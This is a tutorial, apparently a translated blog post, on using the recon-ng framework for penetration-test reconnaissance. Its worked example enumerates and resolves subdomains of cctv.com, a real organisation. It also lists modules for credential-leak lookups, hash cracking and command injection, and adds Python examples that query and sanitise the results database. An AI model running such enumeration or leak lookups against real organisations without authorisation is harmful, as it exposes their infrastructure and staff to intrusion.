Background: during the attack-surface discovery (information gathering) phase at the start of a penetration test, you usually need many separate tools, and at the end you have to merge everything they collected into one place.

There is now a ready-made framework that integrates many information-gathering modules, a database for storing the results, and report-generation modules, which makes engineering-grade information gathering possible.

That framework is recon-ng. recon-ng is written in Python, and the way it is used closely resembles Metasploit.

Usage:

1. Create a workspace (one workspace per penetration-test target is recommended, so that everything collected relates to that single target)

Command: recon-ng -w <workspace name>

Example:

recon-ng -w cctv

# After creating the 'cctv' workspace with the command above, list the workspaces with:
[recon-ng][cctv] > show workspaces

  +------------+
  | Workspaces |
  +------------+
  | cctv       |
  | default    |
  +------------+

2. Configure search-engine API keys

keys list  ===> show the currently configured API keys

keys add shodan_api fdkasjkfljklasjkldffjalks  ===> set the Shodan API key

[recon-ng][cctv] > keys list

  +--------------------------+
  | Name             | Value |
  +--------------------------+
  | bing_api         |       |
  | builtwith_api    |       |
  | censysio_id      |       |
  | censysio_secret  |       |
  | flickr_api       |       |
  | fullcontact_api  |       |
  | github_api       |       |
  | google_api       |       |
  | hashes_api       |       |
  | ipinfodb_api     |       |
  | ipstack_api      |       |
  | jigsaw_api       |       |
  | jigsaw_password  |       |
  | jigsaw_username  |       |
  | pwnedlist_api    |       |
  | pwnedlist_iv     |       |
  | pwnedlist_secret |       |
  | shodan_api       |       |
  | twitter_api      |       |
  | twitter_secret   |       |
  | virustotal_api   |       |
  +--------------------------+

[recon-ng][cctv] > keys add shodan_api fdkasjkfljklasjkldffjalks

3. show options (view the global settings)

[recon-ng][cctv] > show options

  Name        Current Value  Required  Description
  ----------  -------------  --------  -----------
  NAMESERVER  8.8.8.8        yes       nameserver for DNS interrogation
  PROXY                      no        proxy server (address:port)
  THREADS     10             yes       number of threads (where applicable)
  TIMEOUT     10             yes       socket timeout (seconds)
  USER-AGENT  Recon-ng/v4    yes       user-agent string
  VERBOSITY   1              yes       verbosity level (0 = minimal, 1 = verbose, 2 = debug)

It is recommended to set a proxy so that Google can be reached (Google's search capability is hard to beat):

  set PROXY 127.0.0.1:1087

4. Finding out which modules are available

Type use and press the Tab key to list the available modules

[recon-ng][cctv] > use
discovery/info_disclosure/cache_snoop recon/domains-companies/pen recon/domains-hosts/threatcrowd recon/netblocks-hosts/shodan_net
discovery/info_disclosure/interesting_files recon/domains-contacts/metacrawler recon/domains-hosts/threatminer recon/netblocks-hosts/virustotal
exploitation/injection/command_injector recon/domains-contacts/pen recon/domains-vulnerabilities/ghdb recon/netblocks-ports/census_2012
exploitation/injection/xpath_bruter recon/domains-contacts/pgp_search recon/domains-vulnerabilities/punkspider recon/netblocks-ports/censysio
import/csv_file recon/domains-contacts/whois_pocs recon/domains-vulnerabilities/xssed recon/ports-hosts/migrate_ports
import/list recon/domains-credentials/pwnedlist/account_creds recon/domains-vulnerabilities/xssposed recon/profiles-contacts/dev_diver
recon/companies-contacts/bing_linkedin_cache recon/domains-credentials/pwnedlist/api_usage recon/hosts-domains/migrate_hosts recon/profiles-contacts/github_users
recon/companies-contacts/jigsaw/point_usage recon/domains-credentials/pwnedlist/domain_creds recon/hosts-hosts/bing_ip recon/profiles-profiles/namechk
recon/companies-contacts/jigsaw/purchase_contact recon/domains-credentials/pwnedlist/domain_ispwned recon/hosts-hosts/ipinfodb recon/profiles-profiles/profiler
recon/companies-contacts/jigsaw/search_contacts recon/domains-credentials/pwnedlist/leak_lookup recon/hosts-hosts/ipstack recon/profiles-profiles/twitter_mentioned
recon/companies-contacts/pen recon/domains-credentials/pwnedlist/leaks_dump recon/hosts-hosts/resolve recon/profiles-profiles/twitter_mentions
recon/companies-domains/pen recon/domains-domains/brute_suffix recon/hosts-hosts/reverse_resolve recon/profiles-repositories/github_repos
recon/companies-multi/github_miner recon/domains-hosts/bing_domain_api recon/hosts-hosts/ssltools recon/repositories-profiles/github_commits
recon/companies-multi/whois_miner recon/domains-hosts/bing_domain_web recon/hosts-hosts/virustotal recon/repositories-vulnerabilities/gists_search
recon/contacts-contacts/mailtester recon/domains-hosts/brute_hosts recon/hosts-locations/migrate_hosts recon/repositories-vulnerabilities/github_dorks
recon/contacts-contacts/mangle recon/domains-hosts/builtwith recon/hosts-ports/shodan_ip reporting/csv
recon/contacts-contacts/unmangle recon/domains-hosts/certificate_transparency recon/locations-locations/geocode reporting/html
recon/contacts-credentials/hibp_breach recon/domains-hosts/findsubdomains recon/locations-locations/reverse_geocode reporting/json
recon/contacts-credentials/hibp_paste recon/domains-hosts/google_site_web recon/locations-pushpins/flickr reporting/list
recon/contacts-domains/migrate_contacts recon/domains-hosts/hackertarget recon/locations-pushpins/shodan reporting/proxifier
recon/contacts-profiles/fullcontact recon/domains-hosts/mx_spf_ip recon/locations-pushpins/twitter reporting/pushpin
recon/credentials-credentials/adobe recon/domains-hosts/netcraft recon/locations-pushpins/youtube reporting/xlsx
recon/credentials-credentials/bozocrack recon/domains-hosts/shodan_hostname recon/netblocks-companies/whois_orgs reporting/xml
recon/credentials-credentials/hashes_org recon/domains-hosts/ssl_san recon/netblocks-hosts/reverse_resolve

You can also use the search command to find related modules

[recon-ng][cctv] > search google
[*] Searching for 'google'...

  Recon
  -----
    recon/domains-hosts/google_site_web

At this point you may wonder: with this many modules, how do I know what each one does? Select the module with use and then run show info to get a detailed description of it

[recon-ng][cctv] > use recon/domains-hosts/google_site_web
[recon-ng][cctv][google_site_web] > show info

      Name: Google Hostname Enumerator
      Path: modules/recon/domains-hosts/google_site_web.py
    Author: Tim Tomes (@LaNMaSteR53)

Description:
  Harvests hosts from Google.com by using the 'site' search operator. Updates the 'hosts' table with
  the results.

Options:
  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  SOURCE  cctv.com       yes       source of input (see 'show info' for details)

Source Options:
  default      SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL
  <string>     string representing a single input
  <path>       path to a file containing a list of inputs
  query <sql>  database query returning one column of inputs
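To make the four SOURCE forms concrete, here is an added Python example (not part of the original post and not recon-ng's own code) that expands a SOURCE value into the list of inputs the way a module would. It runs against a constructed in-memory SQLite database using the domains table from this post's schema; the default query is the one listed above, and the workspace database path mentioned in the comment is an assumption.

```python
import os
import sqlite3
import tempfile
from pathlib import Path

# Constructed stand-in for a recon-ng workspace database. The real one is an SQLite
# file inside the workspace directory (assumed to be ~/.recon-ng/workspaces/<name>/data.db);
# this example never touches it.
def make_workspace_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE domains (domain TEXT, module TEXT)")
    conn.executemany(
        "INSERT INTO domains VALUES (?, ?)",
        [("cctv.com", "user_defined"),     # the target used in this post
         ("example.com", "user_defined"),  # constructed extra row
         (None, "whois_miner")],           # NULL domain: dropped by the default query
    )
    conn.commit()
    return conn


# Default query exactly as listed under 'Source Options' for google_site_web.
DEFAULT_QUERY = "SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL"


def resolve_source(value, conn, default_query=DEFAULT_QUERY):
    """Expand a SOURCE option value into the list of inputs a module iterates over.

    Implements the four forms from 'show info':
      default      -> run the module's default query
      query <sql>  -> run the given SQL and take its single column
      <path>       -> one input per non-empty line of the file
      <string>     -> a single literal input
    """
    value = value.strip()
    if value == "default":
        return [row[0] for row in conn.execute(default_query)]
    if value.lower().startswith("query "):
        rows = conn.execute(value[len("query "):]).fetchall()
        if rows and len(rows[0]) != 1:
            raise ValueError("a query source must return exactly one column")
        return [row[0] for row in rows if row[0] is not None]
    path = Path(value)
    if path.is_file():
        return [line.strip() for line in path.read_text().splitlines() if line.strip()]
    return [value]


def demo_path_source(conn):
    """Write a constructed hostname list to a temp file and feed it as SOURCE."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("www.cctv.com\n\nnews.cctv.com\n")  # the blank line is skipped
        path = f.name
    try:
        return resolve_source(path, conn)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    db = make_workspace_db()
    for src in ("default", "www.cctv.com",
                "query select domain from domains where domain like '%cctv%'"):
        print(f"{src!r:65} -> {resolve_source(src, db)}")
    print("file source -> ", demo_path_source(db))
```

The order of the checks matters: "default" and the query prefix are tested before the file-system lookup, so a literal hostname that happens to match a file name on disk is the only ambiguous case, and it is resolved the same way recon-ng's help text lists the forms.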

recon-ng also stores everything it collects in a database automatically, so the data can later be pulled back out for further queries. The following command shows which tables the database contains:

[recon-ng][cctv] > show schema

  +---------------+
  | domains       |
  +---------------+
  | domain | TEXT |
  | module | TEXT |
  +---------------+

  +--------------------+
  | companies         |
  +--------------------+
  | company     | TEXT |
  | description | TEXT |
  | module      | TEXT |
  +--------------------+

  +-----------------+
  | netblocks       |
  +-----------------+
  | netblock | TEXT |
  | module   | TEXT |
  +-----------------+

  +-----------------------+
  | locations             |
  +-----------------------+
  | latitude       | TEXT |
  | longitude      | TEXT |
  | street_address | TEXT |
  | module         | TEXT |
  +-----------------------+

  +---------------------+
  | vulnerabilities     |
  +---------------------+
  | host         | TEXT |
  | reference    | TEXT |
  | example      | TEXT |
  | publish_date | TEXT |
  | category     | TEXT |
  | status       | TEXT |
  | module       | TEXT |
  +---------------------+

  +-------------------+
  | ports             |
  +-------------------+
  | ip_address | TEXT |
  | host       | TEXT |
  | port       | TEXT |
  | protocol   | TEXT |
  | module     | TEXT |
  +-------------------+

  +-------------------+
  | hosts             |
  +-------------------+
  | host       | TEXT |
  | ip_address | TEXT |
  | region     | TEXT |
  | country    | TEXT |
  | latitude   | TEXT |
  | longitude  | TEXT |
  | module     | TEXT |
  +-------------------+

  +--------------------+
  | contacts           |
  +--------------------+
  | first_name  | TEXT |
  | middle_name | TEXT |
  | last_name   | TEXT |
  | email       | TEXT |
  | title       | TEXT |
  | region      | TEXT |
  | country     | TEXT |
  | module      | TEXT |
  +--------------------+

  +-----------------+
  | credentials     |
  +-----------------+
  | username | TEXT |
  | password | TEXT |
  | hash     | TEXT |
  | type     | TEXT |
  | leak     | TEXT |
  | module   | TEXT |
  +-----------------+

  +-----------------------------+
  | leaks                       |
  +-----------------------------+
  | leak_id              | TEXT |
  | description          | TEXT |
  | source_refs          | TEXT |
  | leak_type            | TEXT |
  | title                | TEXT |
  | import_date          | TEXT |
  | leak_date            | TEXT |
  | attackers            | TEXT |
  | num_entries          | TEXT |
  | score                | TEXT |
  | num_domains_affected | TEXT |
  | attack_method        | TEXT |
  | target_industries    | TEXT |
  | password_hash        | TEXT |
  | password_type        | TEXT |
  | targets              | TEXT |
  | media_refs           | TEXT |
  | module               | TEXT |
  +-----------------------------+

  +---------------------+
  | pushpins            |
  +---------------------+
  | source       | TEXT |
  | screen_name  | TEXT |
  | profile_name | TEXT |
  | profile_url  | TEXT |
  | media_url    | TEXT |
  | thumb_url    | TEXT |
  | message      | TEXT |
  | latitude     | TEXT |
  | longitude    | TEXT |
  | time         | TEXT |
  | module       | TEXT |
  +---------------------+

  +-----------------+
  | profiles        |
  +-----------------+
  | username | TEXT |
  | resource | TEXT |
  | url      | TEXT |
  | category | TEXT |
  | notes    | TEXT |
  | module   | TEXT |
  +-----------------+

  +--------------------+
  | repositories       |
  +--------------------+
  | name        | TEXT |
  | owner       | TEXT |
  | description | TEXT |
  | resource    | TEXT |
  | category    | TEXT |
  | url         | TEXT |
  | module      | TEXT |
  +--------------------+

5. Worked example (finding a target's subdomains and their IP addresses)

Use Google search to find the target's subdomains:

[recon-ng][cctv] > use recon/domains-hosts/google_site_web
[recon-ng][cctv][google_site_web] > show options   # check which options need to be filled in

  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  SOURCE  default        yes       source of input (see 'show info' for details)

[recon-ng][cctv][google_site_web] > set SOURCE cctv.com   # set the target domain
SOURCE => cctv.com
[recon-ng][cctv][google_site_web] > run   # start the run

The target's subdomains can also be obtained by brute-force guessing:

[recon-ng][cctv] > use recon/domains-hosts/brute_hosts
[recon-ng][cctv][brute_hosts] > show options

  Name      Current Value                                                 Required  Description
  --------  ------------------------------------------------------------  --------  -----------
  SOURCE    default                                                       yes       source of input (see 'show info' for details)
  WORDLIST  /usr/local/Cellar/recon-ng/4.9.6/libexec/data/hostnames.txt  yes       path to hostname wordlist   # wordlist path

[recon-ng][cctv][brute_hosts] > set SOURCE cctv.com   # set the target domain
SOURCE => cctv.com
[recon-ng][cctv][brute_hosts] > run   # start the run

After the run finishes, the data it found is stored in the database automatically. It can be queried with 'show hosts' or with 'query' followed by an SQL statement, for example:

[recon-ng][cctv] > show hosts

  +--------------------------------------------------------------------------------------------------+
  | rowid | host          | ip_address | region | country | latitude | longitude | module          |
  +--------------------------------------------------------------------------------------------------+
  | 1     | tv.cctv.com   |            |        |         |          |           | google_site_web |
  | 2     | www.cctv.com  |            |        |         |          |           | google_site_web |
  | 3     | news.cctv.com |            |        |         |          |           | google_site_web |
  +--------------------------------------------------------------------------------------------------+

[recon-ng][cctv] > query select * from hosts;

  +--------------------------------------------------------------------------------------------------+
  | rowid | host          | ip_address | region | country | latitude | longitude | module          |
  +--------------------------------------------------------------------------------------------------+
  | 1     | tv.cctv.com   |            |        |         |          |           | google_site_web |
  | 2     | www.cctv.com  |            |        |         |          |           | google_site_web |
  | 3     | news.cctv.com |            |        |         |          |           | google_site_web |
  +--------------------------------------------------------------------------------------------------+

# Most of the data has been removed for privacy; only three rows are kept as an example

The database now holds the target's subdomains. Can further queries be built on top of that stored data? Certainly. Take resolving the IP address of each hostname as an example:

[recon-ng][cctv] > use recon/hosts-hosts/resolve
[recon-ng][cctv][resolve] > show options

  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  SOURCE  default        yes       source of input (see 'show info' for details)

# Normally SOURCE would be followed by a single hostname, such as 'www.cctv.com'.
# Here is the clever part: what we want to look up is the contents of a whole table, and setting
# one hostname at a time would be exhausting. recon-ng actually allows the value to be an SQL
# statement, so the table's contents can be queried in bulk!
[recon-ng][cctv][resolve] > set SOURCE query select host from hosts
SOURCE => query select host from hosts
[recon-ng][cctv][resolve] > run

After it finishes, look at how the contents of the database have changed:

[recon-ng][cctv][resolve] > show hosts

  +-------------------------------------------------------------------------------------------------------+
  | rowid | host          | ip_address      | region | country | latitude | longitude | module          |
  +-------------------------------------------------------------------------------------------------------+
  | 1     | tv.cctv.com   | 123.125.195.125 |        |         |          |           | google_site_web |
  | 2     | www.cctv.com  | 114.112.172.231 |        |         |          |           | google_site_web |
  | 3     | news.cctv.com | 111.206.186.245 |        |         |          |           | google_site_web |
  | 4     | tv.cctv.com   | 123.125.195.125 |        |         |          |           | resolve         |
  | 5     | www.cctv.com  | 114.112.172.231 |        |         |          |           | resolve         |
  | 6     | news.cctv.com | 111.206.186.245 |        |         |          |           | resolve         |
  +-------------------------------------------------------------------------------------------------------+

# The resolved IP addresses have been written into the table
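The rows above show why the database matters: the same hostname appears once per module that produced it, and a hostname no resolver has processed yet has an empty ip_address. The following Python example is added here (it is not from the original post and not recon-ng's own code); it rebuilds the hosts table from the post's show schema output with constructed rows and answers the follow-up questions a tester asks before the next step: which hosts still lack an IP, what the deduplicated host/IP pairs are, and which hostnames share an IP address. The two extra hostnames (unresolved.cctv.com and alias-example.cctv.com) are made up for the illustration.

```python
import sqlite3

# hosts table exactly as listed by 'show schema' earlier in the post.
HOSTS_SCHEMA = ("CREATE TABLE hosts (host TEXT, ip_address TEXT, region TEXT, country TEXT, "
                "latitude TEXT, longitude TEXT, module TEXT)")

# Constructed rows: the six from the 'show hosts' output above, plus two made-up ones
# (a hostname no resolver has processed, and one sharing an IP with www.cctv.com).
SAMPLE_ROWS = [
    ("tv.cctv.com",   "123.125.195.125", None, None, None, None, "google_site_web"),
    ("www.cctv.com",  "114.112.172.231", None, None, None, None, "google_site_web"),
    ("news.cctv.com", "111.206.186.245", None, None, None, None, "google_site_web"),
    ("tv.cctv.com",   "123.125.195.125", None, None, None, None, "resolve"),
    ("www.cctv.com",  "114.112.172.231", None, None, None, None, "resolve"),
    ("news.cctv.com", "111.206.186.245", None, None, None, None, "resolve"),
    ("unresolved.cctv.com",    None,              None, None, None, None, "brute_hosts"),
    ("alias-example.cctv.com", "114.112.172.231", None, None, None, None, "resolve"),
]

# recon-ng leaves ip_address NULL; treat an empty string the same way to be safe.
IP_PRESENT = "ip_address IS NOT NULL AND ip_address <> ''"


def make_hosts_db(rows=SAMPLE_ROWS):
    conn = sqlite3.connect(":memory:")
    conn.execute(HOSTS_SCHEMA)
    conn.executemany("INSERT INTO hosts VALUES (?,?,?,?,?,?,?)", rows)
    conn.commit()
    return conn


def unresolved_hosts(conn):
    """Hostnames for which no row carries an IP: the input set for the next resolve run."""
    sql = f"""SELECT DISTINCT host FROM hosts
              WHERE host IS NOT NULL
                AND host NOT IN (SELECT host FROM hosts WHERE {IP_PRESENT} AND host IS NOT NULL)
              ORDER BY host"""
    return [r[0] for r in conn.execute(sql)]


def host_ip_pairs(conn):
    """Deduplicated (host, ip) pairs, whichever module produced them."""
    sql = f"SELECT DISTINCT host, ip_address FROM hosts WHERE {IP_PRESENT} ORDER BY host, ip_address"
    return conn.execute(sql).fetchall()


def hosts_by_ip(conn):
    """Group hostnames per IP address to see which names share infrastructure."""
    sql = f"""SELECT ip_address, GROUP_CONCAT(DISTINCT host) FROM hosts
              WHERE {IP_PRESENT} GROUP BY ip_address ORDER BY ip_address"""
    return {ip: sorted(names.split(",")) for ip, names in conn.execute(sql)}


if __name__ == "__main__":
    db = make_hosts_db()
    print("still unresolved:", unresolved_hosts(db))
    print("distinct host/ip pairs:", host_ip_pairs(db))
    for ip, names in hosts_by_ip(db).items():
        print(ip, "->", ", ".join(names))
```

The first query is the one worth keeping: its SELECT can be pasted after `set SOURCE query ...` so that a repeated resolve run only touches hostnames that still need it, instead of re-resolving the whole table as the post's `select host from hosts` does.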

Using the data we have collected so far, here is how to export a report

[recon-ng][cctv] > search report   # check which reporting modules exist
[*] Searching for 'report'...

  Reporting
  ---------
    reporting/csv
    reporting/html
    reporting/json
    reporting/list
    reporting/proxifier
    reporting/pushpin
    reporting/xlsx
    reporting/xml

[recon-ng][cctv] > use reporting/html   # export as an HTML file
[recon-ng][cctv][html] > show options

  Name      Current Value                                        Required  Description
  --------  ---------------------------------------------------  --------  -----------
  CREATOR                                                        yes       creator name for the report footer
  CUSTOMER                                                       yes       customer name for the report header
  FILENAME  /Users/liwei/.recon-ng/workspaces/cctv/results.html  yes       path and filename for report output   # report output path
  SANITIZE  True                                                 yes       mask sensitive data in the report

[recon-ng][cctv][html] > set CREATOR liwei   # report author
CREATOR => liwei
[recon-ng][cctv][html] > set CUSTOMER cctv   # customer organisation name
CUSTOMER => cctv
[recon-ng][cctv][html] > run
[*] Report generated at '/Users/liwei/.recon-ng/workspaces/cctv/results.html'.   # export succeeded
[recon-ng][cctv][html] >
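The SANITIZE option above is the part of report generation that matters most once the workspace holds credentials from breach-lookup modules: the report is what gets handed to the customer, so leaked secrets must not travel with it. As an added example (not recon-ng's reporting code and not from the original post), the Python below exports a table to CSV with the sensitive columns masked, using the credentials table from the post's show schema output. The masking rule (keep the first character, star out the rest), the set of masked columns and the sample rows are assumptions made for this illustration.

```python
import csv
import sqlite3

# credentials table exactly as listed by 'show schema' earlier in the post.
CREDENTIALS_SCHEMA = ("CREATE TABLE credentials (username TEXT, password TEXT, hash TEXT, "
                      "type TEXT, leak TEXT, module TEXT)")

# Columns masked when sanitize is on (assumed; recon-ng's own rule may differ).
SENSITIVE_COLUMNS = {"password", "hash"}
# Only tables from the schema may be named, so a table name is never interpolated unchecked.
ALLOWED_TABLES = {"domains", "companies", "netblocks", "locations", "vulnerabilities",
                  "ports", "hosts", "contacts", "credentials", "leaks", "pushpins",
                  "profiles", "repositories"}

# Constructed rows: the leak name and the hash are placeholders, not real breach data.
SAMPLE_ROWS = [
    ("alice@example.com", "Winter2019!", None, "plaintext", "constructed-leak-1", "hibp_breach"),
    ("bob@example.com", None, "0123456789abcdef0123456789abcdef", "md5", "constructed-leak-1", "hibp_breach"),
]


def make_db(rows=SAMPLE_ROWS):
    conn = sqlite3.connect(":memory:")
    conn.execute(CREDENTIALS_SCHEMA)
    conn.executemany("INSERT INTO credentials VALUES (?,?,?,?,?,?)", rows)
    conn.commit()
    return conn


def mask(value):
    """Keep the first character and star out the rest (assumed masking rule)."""
    if not value:
        return value
    return value[0] + "*" * (len(value) - 1)


def export_rows(conn, table, sanitize=True):
    """Header row followed by data rows; sensitive columns are masked when sanitize is set."""
    if table not in ALLOWED_TABLES:
        raise ValueError(f"unknown table: {table}")
    cur = conn.execute(f"SELECT * FROM {table}")
    columns = [d[0] for d in cur.description]
    rows = [columns]
    for record in cur:
        rows.append([mask(v) if sanitize and col in SENSITIVE_COLUMNS else v
                     for col, v in zip(columns, record)])
    return rows


def write_csv_report(conn, table, path, sanitize=True):
    """Write the table to a CSV file; returns the number of data rows written."""
    rows = export_rows(conn, table, sanitize)
    with open(path, "w", newline="") as f:
        csv.writer(f).writerows(rows)
    return len(rows) - 1


if __name__ == "__main__":
    db = make_db()
    for row in export_rows(db, "credentials", sanitize=True):
        print(row)
```

Masking is applied per column name rather than per table, so the same exporter serves the hosts or contacts tables unchanged; a report with sanitize=False should only ever be written to the workspace directory, never to the customer deliverable.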

The final report looks like this:

Note: the following brief module descriptions are quoted from another user:

cache_snoop – DNS cache snooping
interesting_files – sensitive file detection
command_injector – remote command injection shell interface
xpath_bruter – XPath injection brute-forcer
csv_file – advanced CSV file import
list – list file import
point_usage – Jigsaw – point usage statistics retrieval
purchase_contact – Jigsaw – single contact lookup
search_contacts – Jigsaw contact enumeration
jigsaw_auth – Jigsaw authenticated contact enumeration
linkedin_auth – LinkedIn authenticated contact enumeration
github_miner – GitHub resource mining
whois_miner – Whois data mining
bing_linkedin – Bing LinkedIn information harvesting
email_validator – SalesMaple email validation
mailtester – MailTester email validation
mangle – contact mangling
unmangle – contact unmangling
hibp_breach – breach search
hibp_paste – paste search
pwnedlist – PwnedList validation
migrate_contacts – migrate domain data to contacts
facebook_directory – Facebook directory crawling
fullcontact – FullContact contact enumeration
adobe – Adobe hash cracking
bozocrack – PyBozoCrack hash lookup
hashes_org – Hashes.org hash lookup
leakdb – leakdb hash lookup
metacrawler – metadata extraction
pgp_search – PGP key owner lookup
salesmaple – SalesMaple contact retrieval
whois_pocs – Whois POC retrieval
account_creds – PwnedList – account credential retrieval
api_usage – PwnedList – API usage information
domain_creds – PwnedList – pwned domain credential retrieval
domain_ispwned – PwnedList – pwned domain statistics retrieval
leak_lookup – PwnedList – leak information lookup
leaks_dump – PwnedList – leak information retrieval
brute_suffix – DNS public suffix brute-forcing
baidu_site – Baidu hostname enumeration
bing_domain_api – Bing API hostname enumeration
bing_domain_web – Bing hostname enumeration
brute_hosts – DNS hostname brute-forcing
builtwith – BuiltWith enumeration
google_site_api – Google CSE hostname enumeration
google_site_web – Google hostname enumeration
netcraft – Netcraft hostname enumeration
shodan_hostname – Shodan hostname enumeration
ssl_san – SSL SAN lookup
vpnhunter – VPNHunter lookup
yahoo_domain – Yahoo hostname enumeration
zone_transfer – DNS zone file collection
ghdb – Google Hacking Database
punkspider – PunkSPIDER vulnerability detection
xssed – XSSed domain lookup
xssposed – XSSposed domain lookup
migrate_hosts – migrate domain data to hosts
bing_ip – Bing API lookup of sites sharing an IP
freegeoip – FreeGeoIP IP geolocation lookup
ip_neighbor – My-IP-Neighbors.com lookup
ipinfodb – IPInfoDB GeoIP lookup
resolve – hostname resolver
reverse_resolve – reverse resolution
ssltools – SSLTools.com hostname lookup
geocode – geocoding
reverse_geocode – reverse geocoding
flickr – Flickr geolocation lookup
instagram – Instagram geolocation lookup
picasa – Picasa geolocation lookup
shodan – Shodan geolocation lookup
twitter – Twitter geolocation lookup
whois_orgs – Whois company information collection
reverse_resolve – reverse resolution
shodan_net – Shodan network enumeration
census_2012 – Internet Census 2012 lookup
sonar_cio – Project Sonar lookup
migrate_ports – migrate host port data
dev_diver – Dev Diver repository check
linkedin – LinkedIn contact retrieval
linkedin_crawl – LinkedIn information crawling
namechk – NameChk.com username validation
profiler – OSINT HUMINT information collection
twitter – Twitter operations
github_repos – GitHub code enumeration
gists_search – GitHub Gist search
github_dorks – GitHub dork analysis
csv – CSV file generation
html – HTML report generation
json – JSON report generation
list – list generation
pushpin – PushPin report generation
xlsx – XLSX file creation
xml – XML report generation
